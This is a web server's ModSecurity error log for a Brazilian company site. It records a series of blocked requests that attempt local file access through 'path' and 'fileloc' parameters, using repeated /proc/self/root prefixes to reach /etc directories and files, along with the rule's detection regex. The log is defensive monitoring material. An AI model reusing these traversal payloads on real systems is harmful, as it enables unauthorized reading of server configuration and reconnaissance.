[Mon Mar 16 11:27:52.615898 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.241.46:57370] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTaLABkC4fWIHEf8HjXQAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:27:53.933678 2026] [:error] [pid 32654:tid 140411725141760] [client 74.7.241.46:57376] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTaQlT9VtDQc7bgUymqwAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:27:55.087263 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.241.46:57384] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTawlT9VtDQc7bgUymrQAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:27:56.379281 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.241.46:57398] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTbAlT9VtDQc7bgUymrwAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:27:57.561116 2026] [:error] [pid 11972:tid 140411582465792] [client 74.7.241.46:57410] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTbZqj1wV0Si-Okefj4wAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:27:58.924673 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.241.46:60154] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTbrABkC4fWIHEf8HjXgAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:00.066666 2026] [:error] [pid 11972:tid 140411574073088] [client 74.7.241.46:60166] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTcJqj1wV0Si-Okefj5QAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:03.858644 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.241.46:60174] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTc7ABkC4fWIHEf8HjYQAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:05.142619 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.241.46:60184] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTdbABkC4fWIHEf8HjZAAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:06.322129 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.241.46:60186] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTdrysWC90G-1nBrA88gAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:07.603043 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.241.46:60202] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTd9SswJuvopo3lOhX7QAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:08.833980 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.241.46:47188] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTeLysWC90G-1nBrA88wAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:10.067356 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.241.46:47200] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTetSswJuvopo3lOhX7wAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:11.359870 2026] [:error] [pid 10709:tid 140411540502272] [client 74.7.241.46:47202] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTexXjF1vJNtV6CWrvyQAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:12.514844 2026] [:error] [pid 10709:tid 140411708356352] [client 74.7.241.46:47204] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTfBXjF1vJNtV6CWrvygAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:13.702133 2026] [:error] [pid 11972:tid 140411565680384] [client 74.7.241.46:47208] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTfZqj1wV0Si-Okefj6AAAABU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:14.889815 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.241.46:47218] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTftSswJuvopo3lOhX8AAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:16.206092 2026] [:error] [pid 10709:tid 140411607643904] [client 74.7.241.46:47234] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTgBXjF1vJNtV6CWrvywAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:17.376083 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.241.46:47246] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTgbysWC90G-1nBrA89AAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:18.551442 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.241.46:55858] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTgtSswJuvopo3lOhX8QAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:30.493515 2026] [:error] [pid 10831:tid 140411540502272] [client 74.7.243.203:50394] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTjo6lpbStxTqkSktlggAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:31.847824 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.243.203:58914] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTj3jZBu2q05ozVU9OgwAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:33.173695 2026] [:error] [pid 21533:tid 140411616036608] [client 74.7.243.203:58922] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTkXjZBu2q05ozVU9OhgAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
